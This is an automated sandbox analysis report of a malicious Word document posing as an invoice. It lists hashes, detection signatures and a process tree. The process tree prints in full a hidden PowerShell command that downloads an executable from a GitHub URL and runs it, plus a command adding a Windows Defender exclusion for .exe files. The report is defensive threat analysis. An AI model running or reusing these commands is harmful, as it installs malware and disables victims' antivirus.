Windows Analysis Report invoice_16214089.doc

Overview

General Information

Sample Name: invoice_16214089.doc
Analysis ID: 545659
MD5: ddce8f154d1d9b9f46544d05807c8fdb
SHA1: 916a36b0bffa682aa9656a764b70a76d4b2ce265
SHA256: ccac6a6acb12bac68c005edf834739a568027bc02c36a7cc039b8326b9510ec4
Tags: doc

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Sigma detected: Suspicious Script Execution From Temp Folder
Wscript starts Powershell (via cmd or directly)
Writes or reads registry keys via WMI
Sigma detected: Change PowerShell Policies to an Unsecure Level
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: WScript or CScript Dropper
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Bypasses PowerShell execution policy
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Tries to download and execute files (via powershell)
Sigma detected: Suspicious Add Task From User AppData Temp
Suspicious powershell command line found
Microsoft Office drops suspicious files
Sigma detected: Powershell Defender Exclusion
Document contains an embedded VBA macro with suspicious strings
.NET source code contains very large strings
Machine Learning detection for dropped file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Binary contains a suspicious time stamp
PE file contains more sections than normal
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Sigma detected: PowerShell Script Run in AppData
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Enables debug privileges
Document contains no OLE stream with summary information
Sigma detected: PowerShell Download from URL
Detected TCP or UDP traffic on non-standard ports
Document contains embedded VBA macros
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 892 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • wscript.exe (PID: 1212 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\putty.vbs" MD5: 045451FA238A75305CC26AC982472367)
      • cmd.exe (PID: 2672 cmdline: "C:\Windows\System32\cmd.exe" /c Powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('https://github.com/Bagir123/AHTuKuKeP/raw/main/BvplycojPlNnhkhIApYVbFZYCJTgYiMu.exe','C:\Users\user\AppData\Local\Temp\putty.exe'); Start-Process C:\Users\user\AppData\Local\Temp\putty.exe -ArgumentList 'BvplycojPlNnhkhIApYVbFZYCJTgYiMu'; MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 2800 cmdline: Powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('https://github.com/Bagir123/AHTuKuKeP/raw/main/BvplycojPlNnhkhIApYVbFZYCJTgYiMu.exe','C:\Users\user\AppData\Local\Temp\putty.exe'); Start-Process C:\Users\user\AppData\Local\Temp\putty.exe -ArgumentList 'BvplycojPlNnhkhIApYVbFZYCJTgYiMu'; MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • putty.exe (PID: 2996 cmdline: "C:\Users\user\AppData\Local\Temp\putty.exe" BvplycojPlNnhkhIApYVbFZYCJTgYiMu MD5: 707C489D66A1C6C72A58ECF13270664B)
            • cmd.exe (PID: 1516 cmdline: "C:\windows\system32\cmd.exe" /C powershell.exe -command Add-MpPreference -ExclusionExtension exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)